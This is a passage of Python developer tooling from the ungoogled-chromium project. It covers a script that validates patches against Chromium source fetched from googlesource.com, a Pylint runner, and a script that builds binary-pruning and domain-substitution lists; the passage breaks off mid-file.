It can be installed from PyPI.') _ROOT_DIR = Path(__file__).resolve().parent.parent _SRC_PATH = Path('src') class _PatchValidationError(Exception): """Raised when patch validation fails""" class _UnexpectedSyntaxError(RuntimeError): """Raised when unexpected syntax is used in DEPS""" class _NotInRepoError(RuntimeError): """Raised when the remote file is not present in the given repo""" class _DepsNodeVisitor(ast.NodeVisitor): _valid_syntax_types = (ast.mod, ast.expr_context, ast.boolop, ast.Assign, ast.Add, ast.Name, ast.Dict, ast.Str, ast.NameConstant, ast.List, ast.BinOp) _allowed_callables = ('Var', ) def visit_Call(self, node): #pylint: disable=invalid-name """Override Call syntax handling""" if node.func.id not in self._allowed_callables: raise _UnexpectedSyntaxError('Unexpected call of "%s" at line %s, column %s' % (node.func.id, node.lineno, node.col_offset)) def generic_visit(self, node): for ast_type in self._valid_syntax_types: if isinstance(node, ast_type): super().generic_visit(node) return raise _UnexpectedSyntaxError('Unexpected {} at line {}, column {}'.format( type(node).__name__, node.lineno, node.col_offset)) def _validate_deps(deps_text): """Returns True if the DEPS file passes validation; False otherwise""" try: _DepsNodeVisitor().visit(ast.parse(deps_text)) except _UnexpectedSyntaxError as exc: get_logger().error('%s', exc) return False return True def _deps_var(deps_globals): """Return a function that implements DEPS's Var() function""" def _var_impl(var_name): """Implementation of Var() in DEPS""" return deps_globals['vars'][var_name] return _var_impl def _parse_deps(deps_text): """Returns a dict of parsed DEPS data""" deps_globals = {'__builtins__': None} deps_globals['Var'] = _deps_var(deps_globals) exec(deps_text, deps_globals) #pylint: disable=exec-used return deps_globals def _download_googlesource_file(download_session, repo_url, version, relative_path): """ Returns the contents of the text file with path within the given googlesource.com repo as a string. 
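Illustrative call (the session object and version string are hypothetical):

        _download_googlesource_file(
            session, 'https://chromium.googlesource.com/chromium/src.git',
            'refs/heads/main', Path('DEPS'))

    fetches <repo_url>/+/refs/heads/main/DEPS?format=TEXT, base64-decodes the
    response body and returns it as a UTF-8 string; an HTTP 404 raises _NotInRepoError.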
""" if 'googlesource.com' not in repo_url: raise ValueError('Repository URL is not a googlesource.com URL: {}'.format(repo_url)) full_url = repo_url + '/+/{}/{}?format=TEXT'.format(version, str(relative_path)) get_logger().debug('Downloading: %s', full_url) response = download_session.get(full_url) if response.status_code == 404: raise _NotInRepoError() response.raise_for_status() # Assume all files that need patching are compatible with UTF-8 return base64.b64decode(response.text, validate=True).decode('UTF-8') def _get_dep_value_url(deps_globals, dep_value): """Helper for _process_deps_entries""" if isinstance(dep_value, str): url = dep_value elif isinstance(dep_value, dict): if 'url' not in dep_value: # Ignore other types like CIPD since # it probably isn't necessary return None url = dep_value['url'] else: raise NotImplementedError() if '{' in url: # Probably a Python format string url = url.format(**deps_globals['vars']) if url.count('@') != 1: raise _PatchValidationError('Invalid number of @ symbols in URL: {}'.format(url)) return url def _process_deps_entries(deps_globals, child_deps_tree, child_path, deps_use_relative_paths): """Helper for _get_child_deps_tree""" for dep_path_str, dep_value in deps_globals.get('deps', dict()).items(): url = _get_dep_value_url(deps_globals, dep_value) if url is None: continue dep_path = Path(dep_path_str) if not deps_use_relative_paths: try: dep_path = Path(dep_path_str).relative_to(child_path) except ValueError: # Not applicable to the current DEPS tree path continue grandchild_deps_tree = None # Delaying creation of dict() until it's needed for recursedeps_item in deps_globals.get('recursedeps', tuple()): if isinstance(recursedeps_item, str): if recursedeps_item == str(dep_path): grandchild_deps_tree = 'DEPS' else: # Some sort of iterable recursedeps_item_path, recursedeps_item_depsfile = recursedeps_item if recursedeps_item_path == str(dep_path): grandchild_deps_tree = recursedeps_item_depsfile if grandchild_deps_tree is None: # This dep is not recursive; i.e. 
it is fully loaded grandchild_deps_tree = dict() child_deps_tree[dep_path] = (*url.split('@'), grandchild_deps_tree) def _get_child_deps_tree(download_session, current_deps_tree, child_path, deps_use_relative_paths): """Helper for _download_source_file""" repo_url, version, child_deps_tree = current_deps_tree[child_path] if isinstance(child_deps_tree, str): # Load unloaded DEPS deps_globals = _parse_deps( _download_googlesource_file(download_session, repo_url, version, child_deps_tree)) child_deps_tree = dict() current_deps_tree[child_path] = (repo_url, version, child_deps_tree) deps_use_relative_paths = deps_globals.get('use_relative_paths', False) _process_deps_entries(deps_globals, child_deps_tree, child_path, deps_use_relative_paths) return child_deps_tree, deps_use_relative_paths def _get_last_chromium_modification(): """Returns the last modification date of the chromium-browser-official tar file""" with _get_requests_session() as session: response = session.head( 'https://storage.googleapis.com/chromium-browser-official/chromium-{}.tar.xz'.format( get_chromium_version())) response.raise_for_status() return email.utils.parsedate_to_datetime(response.headers['Last-Modified']) def _get_gitiles_git_log_date(log_entry): """Helper for _get_gitiles_git_log_date""" return email.utils.parsedate_to_datetime(log_entry['committer']['time']) def _get_gitiles_commit_before_date(repo_url, target_branch, target_datetime): """Returns the hexadecimal hash of the closest commit before target_datetime""" json_log_url = '{repo}/+log/{branch}?format=JSON'.format(repo=repo_url, branch=target_branch) with _get_requests_session() as session: response = session.get(json_log_url) response.raise_for_status() git_log = json.loads(response.text[5:]) # Trim closing delimiters for various structures assert len(git_log) == 2 # 'log' and 'next' entries assert 'log' in git_log assert git_log['log'] git_log = git_log['log'] # Check boundary conditions if _get_gitiles_git_log_date(git_log[0]) < target_datetime: # Newest commit is older than target datetime return git_log[0]['commit'] if _get_gitiles_git_log_date(git_log[-1]) > target_datetime: # Oldest commit is newer than the target datetime; assume oldest is close enough. get_logger().warning('Oldest entry in gitiles log for repo "%s" is newer than target; ' 'continuing with oldest entry...') return git_log[-1]['commit'] # Do binary search low_index = 0 high_index = len(git_log) - 1 mid_index = high_index while low_index != high_index: mid_index = low_index + (high_index - low_index) // 2 if _get_gitiles_git_log_date(git_log[mid_index]) > target_datetime: low_index = mid_index + 1 else: high_index = mid_index return git_log[mid_index]['commit'] class _FallbackRepoManager: """Retrieves fallback repos and caches data needed for determining repos""" _GN_REPO_URL = 'https://gn.googlesource.com/gn.git' def __init__(self): self._cache_gn_version = None @property def gn_version(self): """ Returns the version of the GN repo for the Chromium version used by this code """ if not self._cache_gn_version: # Because there seems to be no reference to the logic for generating the # chromium-browser-official tar file, it's possible that it is being generated # by an internal script that manually injects the GN repository files. # Therefore, assume that the GN version used in the chromium-browser-official tar # files correspond to the latest commit in the master branch of the GN repository # at the time of the tar file's generation. 
We can get an approximation for the # generation time by using the last modification date of the tar file on # Google's file server. self._cache_gn_version = _get_gitiles_commit_before_date( self._GN_REPO_URL, 'master', _get_last_chromium_modification()) return self._cache_gn_version def get_fallback(self, current_relative_path, current_node, root_deps_tree): """ Helper for _download_source_file It returns a new (repo_url, version, new_relative_path) to attempt a file download with """ assert len(current_node) == 3 # GN special processing try: new_relative_path = current_relative_path.relative_to('tools/gn') except ValueError: pass else: if current_node is root_deps_tree[_SRC_PATH]: get_logger().info('Redirecting to GN repo version %s for path: %s', self.gn_version, current_relative_path) return (self._GN_REPO_URL, self.gn_version, new_relative_path) return None, None, None def _get_target_file_deps_node(download_session, root_deps_tree, target_file): """ Helper for _download_source_file Returns the corresponding repo containing target_file based on the DEPS tree """ # The "deps" from the current DEPS file current_deps_tree = root_deps_tree current_node = None # Path relative to the current node (i.e. DEPS file) current_relative_path = Path('src', target_file) previous_relative_path = None deps_use_relative_paths = False child_path = None while current_relative_path != previous_relative_path: previous_relative_path = current_relative_path for child_path in current_deps_tree: try: current_relative_path = previous_relative_path.relative_to(child_path) except ValueError: # previous_relative_path does not start with child_path continue current_node = current_deps_tree[child_path] # current_node will match with current_deps_tree after the following statement current_deps_tree, deps_use_relative_paths = _get_child_deps_tree( download_session, current_deps_tree, child_path, deps_use_relative_paths) break assert not current_node is None return current_node, current_relative_path def _download_source_file(download_session, root_deps_tree, fallback_repo_manager, target_file): """ Downloads the source tree file from googlesource.com download_session is an active requests.Session() object deps_dir is a pathlib.Path to the directory containing a DEPS file. 
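Illustrative call (the target path is hypothetical), mirroring how
    _retrieve_remote_files() uses this helper:

        lines = _download_source_file(
            download_session, root_deps_tree, _FallbackRepoManager(),
            'chrome/browser/some_file.cc').split('\n')

    Raises _NotInRepoError if the file is found neither in the DEPS-derived
    repository nor in any fallback repository.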
""" current_node, current_relative_path = _get_target_file_deps_node(download_session, root_deps_tree, target_file) # Attempt download with potential fallback logic repo_url, version, _ = current_node try: # Download with DEPS-provided repo return _download_googlesource_file(download_session, repo_url, version, current_relative_path) except _NotInRepoError: pass get_logger().debug( 'Path "%s" (relative: "%s") not found using DEPS tree; finding fallback repo...', target_file, current_relative_path) repo_url, version, current_relative_path = fallback_repo_manager.get_fallback( current_relative_path, current_node, root_deps_tree) if not repo_url: get_logger().error('No fallback repo found for "%s" (relative: "%s")', target_file, current_relative_path) raise _NotInRepoError() try: # Download with fallback repo return _download_googlesource_file(download_session, repo_url, version, current_relative_path) except _NotInRepoError: pass get_logger().error('File "%s" (relative: "%s") not found in fallback repo "%s", version "%s"', target_file, current_relative_path, repo_url, version) raise _NotInRepoError() def _initialize_deps_tree(): """ Initializes and returns a dependency tree for DEPS files The DEPS tree is a dict has the following format: key - pathlib.Path relative to the DEPS file's path value - tuple(repo_url, version, recursive dict here) repo_url is the URL to the dependency's repository root If the recursive dict is a string, then it is a string to the DEPS file to load if needed download_session is an active requests.Session() object """ root_deps_tree = { _SRC_PATH: ('https://chromium.googlesource.com/chromium/src.git', get_chromium_version(), 'DEPS') } return root_deps_tree def _retrieve_remote_files(file_iter): """ Retrieves all file paths in file_iter from Google file_iter is an iterable of strings that are relative UNIX paths to files in the Chromium source. Returns a dict of relative UNIX path strings to a list of lines in the file as strings """ files = dict() root_deps_tree = _initialize_deps_tree() try: total_files = len(file_iter) except TypeError: total_files = None logger = get_logger() if total_files is None: logger.info('Downloading remote files...') else: logger.info('Downloading %d remote files...', total_files) last_progress = 0 file_count = 0 fallback_repo_manager = _FallbackRepoManager() with _get_requests_session() as download_session: download_session.stream = False # To ensure connection to Google can be reused for file_path in file_iter: if total_files: file_count += 1 current_progress = file_count * 100 // total_files // 5 * 5 if current_progress != last_progress: last_progress = current_progress logger.info('%d%% downloaded', current_progress) else: current_progress = file_count // 20 * 20 if current_progress != last_progress: last_progress = current_progress logger.info('%d files downloaded', current_progress) try: files[file_path] = _download_source_file(download_session, root_deps_tree, fallback_repo_manager, file_path).split('\n') except _NotInRepoError: get_logger().warning('Could not find "%s" remotely. Skipping...', file_path) return files def _retrieve_local_files(file_iter, source_dir): """ Retrieves all file paths in file_iter from the local source tree file_iter is an iterable of strings that are relative UNIX paths to files in the Chromium source. 
Returns a dict of relative UNIX path strings to a list of lines in the file as strings """ files = dict() for file_path in file_iter: try: raw_content = (source_dir / file_path).read_bytes() except FileNotFoundError: get_logger().warning('Missing file from patches: %s', file_path) continue for encoding in TREE_ENCODINGS: try: content = raw_content.decode(encoding) break except UnicodeDecodeError: continue if not content: raise UnicodeDecodeError('Unable to decode with any encoding: %s' % file_path) files[file_path] = content.split('\n') if not files: get_logger().error('All files used by patches are missing!') return files def _modify_file_lines(patched_file, file_lines): """Helper for _apply_file_unidiff""" # Cursor for keeping track of the current line during hunk application # NOTE: The cursor is based on the line list index, not the line number! line_cursor = None for hunk in patched_file: # Validate hunk will match if not hunk.is_valid(): raise _PatchValidationError('Hunk is not valid: {}'.format(repr(hunk))) line_cursor = hunk.target_start - 1 for line in hunk: normalized_line = line.value.rstrip('\n') if line.is_added: file_lines[line_cursor:line_cursor] = (normalized_line, ) line_cursor += 1 elif line.is_removed: if normalized_line != file_lines[line_cursor]: raise _PatchValidationError( "Line '{}' does not match removal line '{}' from patch".format( file_lines[line_cursor], normalized_line)) del file_lines[line_cursor] elif line.is_context: if not normalized_line and line_cursor == len(file_lines): # We reached the end of the file break if normalized_line != file_lines[line_cursor]: raise _PatchValidationError( "Line '{}' does not match context line '{}' from patch".format( file_lines[line_cursor], normalized_line)) line_cursor += 1 else: assert line.line_type in (LINE_TYPE_EMPTY, LINE_TYPE_NO_NEWLINE) def _apply_file_unidiff(patched_file, files_under_test): """Applies the unidiff.PatchedFile to the source files under testing""" patched_file_path = Path(patched_file.path) if patched_file.is_added_file: if patched_file_path in files_under_test: assert files_under_test[patched_file_path] is None assert len(patched_file) == 1 # Should be only one hunk assert patched_file[0].removed == 0 assert patched_file[0].target_start == 1 files_under_test[patched_file_path] = [x.value.rstrip('\n') for x in patched_file[0]] elif patched_file.is_removed_file: # Remove lines to see if file to be removed matches patch _modify_file_lines(patched_file, files_under_test[patched_file_path]) files_under_test[patched_file_path] = None else: # Patching an existing file assert patched_file.is_modified_file _modify_file_lines(patched_file, files_under_test[patched_file_path]) def _dry_check_patched_file(patched_file, orig_file_content): """Run "patch --dry-check" on a unidiff.PatchedFile for diagnostics""" with tempfile.TemporaryDirectory() as tmpdirname: tmp_dir = Path(tmpdirname) # Write file to patch patched_file_path = tmp_dir / patched_file.path patched_file_path.parent.mkdir(parents=True, exist_ok=True) patched_file_path.write_text(orig_file_content) # Write patch patch_path = tmp_dir / 'broken_file.patch' patch_path.write_text(str(patched_file)) # Dry run _, dry_stdout, _ = dry_run_check(patch_path, tmp_dir) return dry_stdout def _test_patches(series_iter, patch_cache, files_under_test): """ Tests the patches specified in the iterable series_iter Returns a boolean indicating if any of the patches have failed """ for patch_path_str in series_iter: for patched_file in patch_cache[patch_path_str]: 
orig_file_content = None if get_logger().isEnabledFor(logging.DEBUG): orig_file_content = files_under_test.get(Path(patched_file.path)) if orig_file_content: orig_file_content = ' '.join(orig_file_content) try: _apply_file_unidiff(patched_file, files_under_test) except _PatchValidationError as exc: get_logger().warning('Patch failed validation: %s', patch_path_str) get_logger().debug('Specifically, file "%s" failed validation: %s', patched_file.path, exc) if get_logger().isEnabledFor(logging.DEBUG): # _PatchValidationError cannot be thrown when a file is added assert patched_file.is_modified_file or patched_file.is_removed_file assert orig_file_content is not None get_logger().debug( 'Output of "patch --dry-run" for this patch on this file:\n%s', _dry_check_patched_file(patched_file, orig_file_content)) return True except: #pylint: disable=bare-except get_logger().warning('Patch failed validation: %s', patch_path_str) get_logger().debug('Specifically, file "%s" caused exception while applying:', patched_file.path, exc_info=True) return True return False def _load_all_patches(series_iter, patches_dir): """ Returns a tuple of the following: - boolean indicating success or failure of reading files - dict of relative UNIX path strings to unidiff.PatchSet """ had_failure = False unidiff_dict = dict() for relative_path in series_iter: if relative_path in unidiff_dict: continue unidiff_dict[relative_path] = unidiff.PatchSet.from_filename(str(patches_dir / relative_path), encoding=ENCODING) if not (patches_dir / relative_path).read_text(encoding=ENCODING).endswith('\n'): had_failure = True get_logger().warning('Patch file does not end with newline: %s', str(patches_dir / relative_path)) return had_failure, unidiff_dict def _get_required_files(patch_cache): """Returns an iterable of pathlib.Path files needed from the source tree for patching""" new_files = set() # Files introduced by patches file_set = set() for patch_set in patch_cache.values(): for patched_file in patch_set: if patched_file.is_added_file: new_files.add(patched_file.path) elif patched_file.path not in new_files: file_set.add(Path(patched_file.path)) return file_set def _get_files_under_test(args, required_files, parser): """ Helper for main to get files_under_test Exits the program if --cache-remote debugging option is used """ if args.local: files_under_test = _retrieve_local_files(required_files, args.local) else: # --remote and --cache-remote files_under_test = _retrieve_remote_files(required_files) if args.cache_remote: for file_path, file_content in files_under_test.items(): if not (args.cache_remote / file_path).parent.exists(): (args.cache_remote / file_path).parent.mkdir(parents=True) with (args.cache_remote / file_path).open('w', encoding=ENCODING) as cache_file: cache_file.write('\n'.join(file_content)) parser.exit() return files_under_test def main(): """CLI Entrypoint""" parser = argparse.ArgumentParser(description=__doc__) parser.add_argument('-s', '--series', type=Path, metavar='FILE', default=str(Path('patches', 'series')), help='The series file listing patches to apply. Default: %(default)s') parser.add_argument('-p', '--patches', type=Path, metavar='DIRECTORY', default='patches', help='The patches directory to read from. Default: %(default)s') add_common_params(parser) file_source_group = parser.add_mutually_exclusive_group(required=True) file_source_group.add_argument( '-l', '--local', type=Path, metavar='DIRECTORY', help= 'Use a local source tree. 
It must be UNMODIFIED, otherwise the results will not be valid.') file_source_group.add_argument( '-r', '--remote', action='store_true', help=('Download the required source tree files from Google. ' 'This feature requires the Python module "requests". If you do not want to ' 'install this, consider using --local instead.')) file_source_group.add_argument( '-c', '--cache-remote', type=Path, metavar='DIRECTORY', help='(For debugging) Store the required remote files in an empty local directory') args = parser.parse_args() if args.cache_remote and not args.cache_remote.exists(): if args.cache_remote.parent.exists(): args.cache_remote.mkdir() else: parser.error('Parent of cache path {} does not exist'.format(args.cache_remote)) if not args.series.is_file(): parser.error('--series path is not a file or not found: {}'.format(args.series)) if not args.patches.is_dir(): parser.error('--patches path is not a directory or not found: {}'.format(args.patches)) series_iterable = tuple(parse_series(args.series)) had_failure, patch_cache = _load_all_patches(series_iterable, args.patches) required_files = _get_required_files(patch_cache) files_under_test = _get_files_under_test(args, required_files, parser) had_failure |= _test_patches(series_iterable, patch_cache, files_under_test) if had_failure: get_logger().error('***FAILED VALIDATION; SEE ABOVE***') if not args.verbose: get_logger().info('(For more error details, re-run with the "-v" flag)') parser.exit(status=1) else: get_logger().info('Passed validation (%d patches total)', len(series_iterable)) if __name__ == '__main__': main() File: devutils/run_other_pylint.py #!/usr/bin/env python3 # Copyright (c) 2019 The ungoogled-chromium Authors. All rights reserved. # Use of this source code is governed by a BSD-style license that can be # found in the LICENSE file. """Run Pylint over any module""" import argparse import os import shutil import sys from pathlib import Path from pylint import lint class ChangeDir: """ Changes directory to path in with statement """ def __init__(self, path): self._path = path self._orig_path = os.getcwd() def __enter__(self): os.chdir(str(self._path)) def __exit__(self, *_): os.chdir(self._orig_path) def run_pylint(module_path, pylint_options, ignore_prefixes=tuple()): """Runs Pylint. 
Returns a boolean indicating success""" pylint_stats = Path('/run/user/{}/pylint_stats'.format(os.getuid())) if not pylint_stats.parent.is_dir(): #pylint: disable=no-member pylint_stats = Path('/run/shm/pylint_stats') os.environ['PYLINTHOME'] = str(pylint_stats) input_paths = list() if not module_path.exists(): print('ERROR: Cannot find', module_path) sys.exit(1) if module_path.is_dir(): for path in module_path.rglob('*.py'): ignore_matched = False for prefix in ignore_prefixes: if path.parts[:len(prefix)] == prefix: ignore_matched = True break if ignore_matched: continue input_paths.append(str(path)) else: input_paths.append(str(module_path)) runner = lint.Run((*input_paths, *pylint_options), do_exit=False) if pylint_stats.is_dir(): shutil.rmtree(str(pylint_stats)) if runner.linter.msg_status != 0: print('WARNING: Non-zero exit status:', runner.linter.msg_status) return False return True def main(): """CLI entrypoint""" parser = argparse.ArgumentParser(description='Run Pylint over arbitrary module') parser.add_argument('--hide-fixme', action='store_true', help='Hide "fixme" Pylint warnings.') parser.add_argument('--show-locally-disabled', action='store_true', help='Show "locally-disabled" Pylint warnings.') parser.add_argument('module_path', type=Path, help='Path to the module to check') args = parser.parse_args() if not args.module_path.exists(): print('ERROR: Module path "{}" does not exist'.format(args.module_path)) sys.exit(1) disables = [ 'wrong-import-position', 'bad-continuation', ] if args.hide_fixme: disables.append('fixme') if not args.show_locally_disabled: disables.append('locally-disabled') pylint_options = [ '--disable={}'.format(','.join(disables)), '--jobs=4', '--score=n', '--persistent=n', ] if not run_pylint(args.module_path, pylint_options): sys.exit(1) sys.exit(0) if __name__ == '__main__': main() File: devutils/update_lists.py #!/usr/bin/env python3 # Copyright (c) 2019 The ungoogled-chromium Authors. All rights reserved. # Use of this source code is governed by a BSD-style license that can be # found in the LICENSE file. """ Update binary pruning and domain substitution lists automatically. It will download and unpack into the source tree as necessary. No binary pruning or domain substitution will be applied to the source tree after the process has finished. 
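A typical invocation might look like the following (illustrative; the tree path is hypothetical):

    python3 devutils/update_lists.py -t build/src --processes 4

By default the resulting pruning.list and domain_substitution.list are written to the
current working directory (see the --pruning and --domain-substitution options in main()).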
""" import argparse import os import sys from itertools import repeat from multiprocessing import Pool from pathlib import Path, PurePosixPath sys.path.insert(0, str(Path(__file__).resolve().parent.parent / 'utils')) from _common import get_logger from domain_substitution import DomainRegexList, TREE_ENCODINGS from prune_binaries import CONTINGENT_PATHS sys.path.pop(0) # Encoding for output files _ENCODING = 'UTF-8' # NOTE: Include patterns have precedence over exclude patterns # pathlib.Path.match() paths to include in binary pruning PRUNING_INCLUDE_PATTERNS = [ 'components/domain_reliability/baked_in_configs/*', # Removals for patches/core/ungoogled-chromium/remove-unused-preferences-fields.patch 'components/safe_browsing/core/common/safe_browsing_prefs.cc', 'components/safe_browsing/core/common/safe_browsing_prefs.h', 'components/signin/public/base/signin_pref_names.cc', 'components/signin/public/base/signin_pref_names.h', ] # pathlib.Path.match() paths to exclude from binary pruning PRUNING_EXCLUDE_PATTERNS = [ 'chrome/common/win/eventlog_messages.mc', # TODO: False positive textfile # Exclusions for DOM distiller (contains model data only) 'components/dom_distiller/core/data/distillable_page_model_new.bin', 'components/dom_distiller/core/data/long_page_model.bin', # Exclusions for GeoLanguage data # Details: https://docs.google.com/document/d/18WqVHz5F9vaUiE32E8Ge6QHmku2QSJKvlqB9JjnIM-g/edit # Introduced with: https://chromium.googlesource.com/chromium/src/+/6647da61 'components/language/content/browser/ulp_language_code_locator/geolanguage-data_rank0.bin', 'components/language/content/browser/ulp_language_code_locator/geolanguage-data_rank1.bin', 'components/language/content/browser/ulp_language_code_locator/geolanguage-data_rank2.bin', # Exclusion for required prebuilt object for Windows arm64 builds 'third_party/crashpad/crashpad/util/misc/capture_context_win_arm64.obj', 'third_party/icu/common/icudtl.dat', # Exclusion for ICU data # Exclusion for Android 'build/android/chromium-debug.keystore', 'third_party/icu/android/icudtl.dat', 'third_party/icu/common/icudtb.dat', # Exclusion for performance tracing 'third_party/perfetto/src/trace_processor/importers/proto/atoms.descriptor', # Exclusions for safe file extensions '*.avif', '*.ttf', '*.png', '*.jpg', '*.webp', '*.gif', '*.ico', '*.mp3', '*.wav', '*.flac', '*.icns', '*.woff', '*.woff2', '*makefile', '*.profdata', '*.xcf', '*.cur', '*.pdf', '*.ai', '*.h', '*.c', '*.cpp', '*.cc', '*.mk', '*.bmp', '*.py', '*.xml', '*.html', '*.js', '*.json', '*.txt', '*.xtb' ] # NOTE: Domain substitution path prefix exclusion has precedence over inclusion patterns # Paths to exclude by prefixes of the POSIX representation for domain substitution DOMAIN_EXCLUDE_PREFIXES = [ 'components/test/', 'net/http/transport_security_state_static.json', 'net/http/transport_security_state_static_pins.json', # Exclusions for Visual Studio Project generation with GN (PR #445) 'tools/gn/', # Exclusions for files covered with other patches/unnecessary 'components/search_engines/prepopulated_engines.json', 'third_party/blink/renderer/core/dom/document.cc', ] # pathlib.Path.match() patterns to include in domain substitution DOMAIN_INCLUDE_PATTERNS = [ '*.h', '*.hh', '*.hpp', '*.hxx', '*.cc', '*.cpp', '*.cxx', '*.c', '*.h', '*.json', '*.js', '*.html', '*.htm', '*.css', '*.py*', '*.grd*', '*.sql', '*.idl', '*.mk', '*.gyp*', 'makefile', '*.ts', '*.txt', '*.xml', '*.mm', '*.jinja*', '*.gn', '*.gni' ] # Binary-detection constant _TEXTCHARS = bytearray({7, 8, 9, 10, 12, 13, 
27} | set(range(0x20, 0x100)) - {0x7f}) class UnusedPatterns: #pylint: disable=too-few-public-methods """Tracks unused prefixes and patterns""" _all_names = ('pruning_include_patterns', 'pruning_exclude_patterns', 'domain_include_patterns', 'domain_exclude_prefixes') def __init__(self): # Initialize all tracked patterns and prefixes in sets # Users will discard elements that are used for name in self._all_names: setattr(self, name, set(globals()[name.upper()])) def log_unused(self, error=True): """ Logs unused patterns and prefixes Returns True if there are unused patterns or prefixes; False otherwise """ have_unused = False log = get_logger().error if error else get_logger().info for name in self._all_names: current_set = getattr(self, name, None) if current_set: log('Unused from %s: %s', name.upper(), current_set) have_unused = True return have_unused def _is_binary(bytes_data): """ Returns True if the data seems to be binary data (i.e. not human readable); False otherwise """ # From: https://stackoverflow.com/a/7392391 return bool(bytes_data.translate(None, _TEXTCHARS)) def _dir_empty(path): """ Returns True if the directory is empty; False otherwise path is a pathlib.Path or string to a directory to test. """ try: next(os.scandir(str(path))) except StopIteration: return True return False def should_prune(path, relative_path, used_pep_set, used_pip_set): """ Returns True if a path should be pruned from the source tree; False otherwise path is the pathlib.Path to the file from the current working directory. relative_path is the pathlib.Path to the file from the source tree used_pep_set is a list of PRUNING_EXCLUDE_PATTERNS that have been matched used_pip_set is a list of PRUNING_INCLUDE_PATTERNS that have been matched """ # Match against include patterns for pattern in filter(relative_path.match, PRUNING_INCLUDE_PATTERNS): used_pip_set.add(pattern) return True # Match against exclude patterns for pattern in filter(Path(str(relative_path).lower()).match, PRUNING_EXCLUDE_PATTERNS): used_pep_set.add(pattern) return False # Do binary data detection with path.open('rb') as file_obj: if _is_binary(file_obj.read()): return True # Passed all filtering; do not prune return False def _check_regex_match(file_path, search_regex): """ Returns True if a regex pattern matches a file; False otherwise file_path is a pathlib.Path to the file to test search_regex is a compiled regex object to search for domain names """ with file_path.open("rb") as file_obj: file_bytes = file_obj.read() content = None for encoding in TREE_ENCODINGS: try: content = file_bytes.decode(encoding) break except UnicodeDecodeError: continue if not search_regex.search(content) is None: return True return False def should_domain_substitute(path, relative_path, search_regex, used_dep_set, used_dip_set): """ Returns True if a path should be domain substituted in the source tree; False otherwise path is the pathlib.Path to the file from the current working directory. relative_path is the pathlib.Path to the file from the source tree. 
used_dep_set is a list of DOMAIN_EXCLUDE_PREFIXES that have been matched used_dip_set is a list of DOMAIN_INCLUDE_PATTERNS that have been matched """ relative_path_posix = relative_path.as_posix().lower() for include_pattern in DOMAIN_INCLUDE_PATTERNS: if PurePosixPath(relative_path_posix).match(include_pattern): used_dip_set.add(include_pattern) for exclude_prefix in DOMAIN_EXCLUDE_PREFIXES: if relative_path_posix.startswith(exclude_prefix): used_dep_set.add(exclude_prefix) return False return _check_regex_match(path, search_regex) return False def compute_lists_proc(path, source_tree, search_regex): """ Adds the path to appropriate lists to be used by compute_lists. path is the pathlib.Path to the file from the current working directory. source_tree is a pathlib.Path to the source tree search_regex is a compiled regex object to search for domain names """ used_pep_set = set() # PRUNING_EXCLUDE_PATTERNS used_pip_set = set() # PRUNING_INCLUDE_PATTERNS used_dep_set = set() # DOMAIN_EXCLUDE_PREFIXES used_dip_set = set() # DOMAIN_INCLUDE_PATTERNS pruning_set = set() domain_substitution_set = set() symlink_set = set() if path.is_file(): relative_path = path.relative_to(source_tree) if not any(cpath in str(relative_path.as_posix()) for cpath in CONTINGENT_PATHS): if path.is_symlink(): try: resolved_relative_posix = path.resolve().relative_to(source_tree).as_posix() symlink_set.add((resolved_relative_posix, relative_path.as_posix())) except ValueError: # Symlink leads out of the source tree pass elif not any(skip in ('.git', '__pycache__', 'uc_staging') for skip in path.parts): try: if should_prune(path, relative_path, used_pep_set, used_pip_set): pruning_set.add(relative_path.as_posix()) elif should_domain_substitute(path, relative_path, search_regex, used_dep_set, used_dip_set): domain_substitution_set.add(relative_path.as_posix()) except: #pylint: disable=bare-except get_logger().exception('Unhandled exception while processing %s', relative_path) return (used_pep_set, used_pip_set, used_dep_set, used_dip_set, pruning_set, domain_substitution_set, symlink_set) def compute_lists(source_tree, search_regex, processes): # pylint: disable=too-many-locals """ Compute the binary pruning and domain substitution lists of the source tree. Returns a tuple of three items in the following order: 1. The sorted binary pruning list 2. The sorted domain substitution list 3. 
An UnusedPatterns object source_tree is a pathlib.Path to the source tree search_regex is a compiled regex object to search for domain names processes is the maximum number of worker processes to create """ pruning_set = set() domain_substitution_set = set() symlink_set = set() # POSIX resolved path -> set of POSIX symlink paths source_tree = source_tree.resolve() unused_patterns = UnusedPatterns() # Launch multiple processes iterating over the source tree with Pool(processes) as procpool: returned_data = procpool.starmap( compute_lists_proc, zip(source_tree.rglob('*'), repeat(source_tree), repeat(search_regex))) # Handle the returned data for (used_pep_set, used_pip_set, used_dep_set, used_dip_set, returned_pruning_set, returned_domain_sub_set, returned_symlink_set) in returned_data: # pragma pylint: disable=no-member unused_patterns.pruning_exclude_patterns.difference_update(used_pep_set) unused_patterns.pruning_include_patterns.difference_update(used_pip_set) unused_patterns.domain_exclude_prefixes.difference_update(used_dep_set) unused_patterns.domain_include_patterns.difference_update(used_dip_set) # pragma pylint: enable=no-member pruning_set.update(returned_pruning_set) domain_substitution_set.update(returned_domain_sub_set) symlink_set.update(returned_symlink_set) # Prune symlinks for pruned files for (resolved, symlink) in symlink_set: if resolved in pruning_set: pruning_set.add(symlink) return sorted(pruning_set), sorted(domain_substitution_set), unused_patterns def main(args_list=None): """CLI entrypoint""" parser = argparse.ArgumentParser(description=__doc__) parser.add_argument('--pruning', metavar='PATH', type=Path, default='pruning.list', help='The path to store pruning.list. Default: %(default)s') parser.add_argument('--domain-substitution', metavar='PATH', type=Path, default='domain_substitution.list', help='The path to store domain_substitution.list. Default: %(default)s') parser.add_argument('--domain-regex', metavar='PATH', type=Path, default='domain_regex.list', help='The path to domain_regex.list. Default: %(default)s') parser.add_argument('-t', '--tree', metavar='PATH', type=Path, required=True, help='The path to the source tree to use.') parser.add_argument( '--processes', metavar='NUM', type=int, default=None, help= 'The maximum number of worker processes to create. Defaults to the number of system CPUs.') parser.add_argument('--domain-exclude-prefix', metavar='PREFIX', type=str, action='append', help='Additional exclusion for domain_substitution.list.') parser.add_argument('--no-error-unused', action='store_false', dest='error_unused', help='Do not treat unused patterns/prefixes as an error.') args = parser.parse_args(args_list) if args.domain_exclude_prefix is not None: DOMAIN_EXCLUDE_PREFIXES.extend(args.domain_exclude_prefix) if args.tree.exists() and not _dir_empty(args.tree): get_logger().info('Using existing source tree at %s', args.tree) else: get_logger().error('No source tree found. 
